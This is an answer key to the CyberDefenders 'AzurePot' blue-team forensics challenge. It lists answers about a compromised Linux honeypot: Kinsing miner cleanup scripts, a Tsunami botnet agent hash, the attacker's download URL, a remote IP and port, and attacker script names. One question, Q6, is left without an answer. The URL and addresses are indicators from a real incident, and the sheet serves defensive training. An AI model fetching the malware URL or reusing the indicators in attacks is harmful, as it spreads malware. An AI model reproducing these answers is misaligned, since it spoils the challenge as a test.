AzurePot
Link : https://cyberdefenders.org/blueteam-ctf-challenges/azurepot/
Q1 File => sdb.vhd There is a script that runs every minute to do cleanup. What is the name of the file?
Answer : .remove.sh
Q2 File => sdb.vhd The script in the Q#1 terminates processes associated with two Bitcoin miner malware files. What is the name of 1st malware file?
Answer : kinsing
Q3 File => sdb.vhd The script in Q#1 changes the permissions for some files. What is their new permission?
Answer : 444
Q4 File => sdb.vhd What is the sha256 of the botnet agent file?
Answer : 0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049
Q5 File => sdb.vhd What is the name of the botnet in Q#4?
Description : https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami
Answer : tsunami
Q6 File => sdb.vhd What IP address matches the creation timestamp of the botnet agent file in Q#4?
Created Time of file dk86
Q7 File => sdb.vhd What URL did the attacker use to download the botnet agent?
Answer : http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86
Q8 File => sdb.vhd What is the name of the file that the attacker downloaded to execute the malicious script and subsequently remove itself?
Answer : .install
Q9 File => sdb.vhd The attacker downloaded sh scripts. What are the names of these files?
Answer : 0_cron.sh, 0_linux.sh, ap.sh
Q10 File => UAC Two suspicious processes were running from a deleted directory. What are their PIDs?
Answer : 6388, 20645
Q11 File => UAC What is the suspicious command line associated with the 2nd PID in Q#10?
Answer : sh .src.sh
Q12 File => UAC UAC gathered some data from the second process in Q#10. What is the remote IP address and remote port that was used in the attack?
Answer : 116.202.187.77:56590
Q13 File => UAC Which user was responsible for executing the command in Q#11?
Answer : daemon
Q14 File => UAC Two suspicious shell processes were running from the tmp folder. What are their PIDs?
Answer : 15853, 21785
Q15 File => ubuntu.20211208.mem What is the MAC address of the captured memory?
Answer : 00:22:48:26:3b:16
Q16 File => ubuntu.20211208.mem From Bash history. The attacker downloaded an sh script. What is the name of the file?
Answer : unk.sh
Last updated